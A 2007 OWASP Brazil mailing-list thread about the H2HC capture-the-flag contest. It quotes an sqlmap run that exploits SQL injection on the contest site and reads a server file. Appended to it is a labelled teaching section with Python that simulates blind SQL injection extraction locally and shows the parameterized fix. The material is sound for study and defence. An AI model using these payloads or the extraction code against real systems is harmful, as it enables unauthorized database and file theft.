[Owasp-brazil] Resultado Capture The Flag - H2HC 2007.

Wagner Elias wagner.elias at gmail.com
Wed Nov 14 06:45:33 EST 2007


Good morning Bernardo...

Could you share some ideas and tell us a bit about how the Italian chapter
works?

Regards.
Wagner Elias 

-----Original Message-----
From: owasp-brazil-bounces at lists.owasp.org
[mailto:owasp-brazil-bounces at lists.owasp.org] On Behalf Of Bernardo Damele
Sent: Wednesday, November 14, 2007 06:59
To: dum_dum at frontthescene.com.br; owasp-brazil at lists.owasp.org
Subject: Re: [Owasp-brazil] Resultado Capture The Flag - H2HC 2007.

Hi OWASP Brasil,

my name is Bernardo, I'm from Rio but have lived in Italy for many years.
I have been part of OWASP Italy
(http://www.owasp.org/index.php/Italy#OWASP-Italy_Board) for about a
year, and I'm glad to see that you at OWASP Brasil are also organizing
activities and meetings!

On Nov 14, 2007 2:09 AM,  <dum_dum at frontthescene.com.br> wrote:
> ...
> debian:/tmp/sqlmap# python sqlmap.py --url="http://webdefenderh2hc.h2hc.org.br/ctf/show_noticia_popup.php?id=8" --file="/etc/H2HCdesafioWebDefender.txt" -v1
>
>     sqlmap/0.5-rc3 coded by inquis <bernardo.damele at gmail.com>
>                     and belch <daniele.bellucci at gmail.com>
>
> [*] starting at: 12:07:05
>
> [12:07:06] [INFO] testing if the url is stable, wait a few seconds
> [12:07:08] [INFO] url is stable
> [12:07:08] [INFO] testing if 'id' parameter is dynamic
> [12:07:08] [INFO] confirming that 'id' parameter is dynamic
> [12:07:08] [INFO] parameter 'id' is dynamic
> [12:07:08] [INFO] testing sql injection on parameter 'id'
> [12:07:08] [INFO] testing numeric/unescaped injection on parameter 'id'
> [12:07:09] [INFO] parameter 'id' is not numeric/unescaped injectable
> [12:07:09] [INFO] testing string/single quote injection on parameter 'id'
> [12:07:10] [INFO] confirming string/single quote injection on parameter 'id'
> [12:07:10] [INFO] parameter 'id' is string/single quote injectable
> [12:07:10] [INFO] testing MySQL
> [12:07:10] [INFO] query: CONCAT('7', '7')
> [12:07:10] [INFO] retrieved: 77
> [12:07:17] [INFO] performed 20 queries in 6 seconds
> [12:07:17] [INFO] confirming MySQL
> [12:07:17] [INFO] query: LENGTH('7')
> [12:07:17] [INFO] retrieved: 1
> [12:07:20] [INFO] performed 13 queries in 3 seconds
> [12:07:20] [INFO] query: SELECT 7 FROM information_schema.TABLES LIMIT 0, 1
> [12:07:20] [INFO] retrieved: 7
> [12:07:25] [INFO] performed 13 queries in 4 seconds
> remote DBMS:    MySQL >= 5.0.0
>
> [12:07:25] [INFO] fetching file: '/etc/H2HCdesafioWebDefender.txt'
> [12:07:25] [INFO] query: LOAD_FILE('/etc/H2HCdesafioWebDefender.txt')
> [12:07:25] [INFO] retrieved:
> ...

How nice to see that you used my program sqlmap as a demonstration here
;-)

--
Bernardo Damele

Email address: bernardo.damele (at) gmail.com Mobile number: +39 3493821385
_______________________________________________
Owasp-brazil mailing list
Owasp-brazil at lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-brazil
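The sqlmap run quoted above never sees the query result directly: every value ("77", "1", "7", and finally the contents of the file) is recovered one true/false question at a time through the string/single-quote injection in the 'id' parameter, which is why the log reports "performed 20 queries" to read two characters. The following Python is an added example, not sqlmap's code and not part of the original thread, that models that inference against a simulated copy of the vulnerable page. Everything in it is assumed for illustration: the page is simulated with an in-memory SQLite database rather than MySQL, the table `noticia` and its contents are constructed, and SQLite's `||` stands in for CONCAT() (LOAD_FILE() has no SQLite equivalent, so reading the flag file is not reproduced). A parameterized variant of the page is included so the same oracle can be seen to fail against the fix.

```python
"""Boolean-based blind SQL injection inference, simulated locally.

Added example (not sqlmap's code, not from the thread). The 'id' parameter is
injectable inside single quotes; each character of a value is recovered by
asking the application yes/no questions and bisecting on its code point.
The back end is SQLite, not MySQL; the table and rows are constructed.
"""
import sqlite3
from typing import Callable

# Constructed sample data standing in for the CTF site's news table (assumed name).
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE noticia (id TEXT, titulo TEXT)")
_conn.execute("INSERT INTO noticia VALUES ('8', 'H2HC 2007 CTF')")
_conn.commit()


def vulnerable_page(id_param: str) -> bool:
    """Simulated show_noticia_popup.php: the query is built by string
    concatenation (the bug). Returns True when a row would be rendered."""
    sql = "SELECT titulo FROM noticia WHERE id = '" + id_param + "'"
    try:
        return _conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_page(id_param: str) -> bool:
    """The fix: a bound parameter, so the quote in the payload is just data."""
    row = _conn.execute("SELECT titulo FROM noticia WHERE id = ?", (id_param,)).fetchone()
    return row is not None


def make_oracle(page: Callable[[str], bool], base_id: str = "8") -> Callable[[str], bool]:
    """Turn the page into a boolean oracle: inject AND (<condition>) inside the
    quotes, closing the statement with AND '1'='1 so the original trailing
    quote still balances. The row appears only when <condition> is true."""
    def ask(condition: str) -> bool:
        payload = f"{base_id}' AND ({condition}) AND '1'='1"
        return page(payload)
    return ask


def infer_length(ask: Callable[[str], bool], expr: str, max_len: int = 64) -> int:
    """Bisect on LENGTH(expr) within [0, max_len]."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"LENGTH({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def infer_char(ask: Callable[[str], bool], expr: str, pos: int) -> str:
    """Bisect on the code point of the pos-th (1-based) character of expr.
    Seven questions cover the 7-bit ASCII range [0, 127]."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        # SQLite: UNICODE() is the code point, SUBSTR() the character slice.
        if ask(f"UNICODE(SUBSTR({expr}, {pos}, 1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def infer_value(ask: Callable[[str], bool], expr: str) -> tuple[str, int]:
    """Recover the full result of expr; also return the number of requests used.
    For '7' || '7' this costs 6 (length) + 2 * 7 (characters) = 20 requests,
    the same count the quoted log reports for CONCAT('7', '7'), although
    sqlmap's own search bounds are not assumed to be identical."""
    counter = {"n": 0}

    def counting_ask(condition: str) -> bool:
        counter["n"] += 1
        return ask(condition)

    length = infer_length(counting_ask, expr)
    value = "".join(infer_char(counting_ask, expr, i) for i in range(1, length + 1))
    return value, counter["n"]


if __name__ == "__main__":
    ask = make_oracle(vulnerable_page)
    print(infer_value(ask, "'7' || '7'"))                                   # ('77', 20)
    print(infer_value(ask, "(SELECT titulo FROM noticia WHERE id = '8')"))  # ('H2HC 2007 CTF', ...)
    print(infer_value(make_oracle(safe_page), "'7' || '7'"))                # ('', 7): nothing leaks
```

The subquery in the second call is the same move the log makes with `SELECT 7 FROM information_schema.TABLES LIMIT 0, 1`: any scalar expression the back end can evaluate, a file read through LOAD_FILE() included, can be pulled out through the same yes/no channel once the oracle works. Against `safe_page` every condition is answered "no", so the length bisection bottoms out at 0 and no characters are requested.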
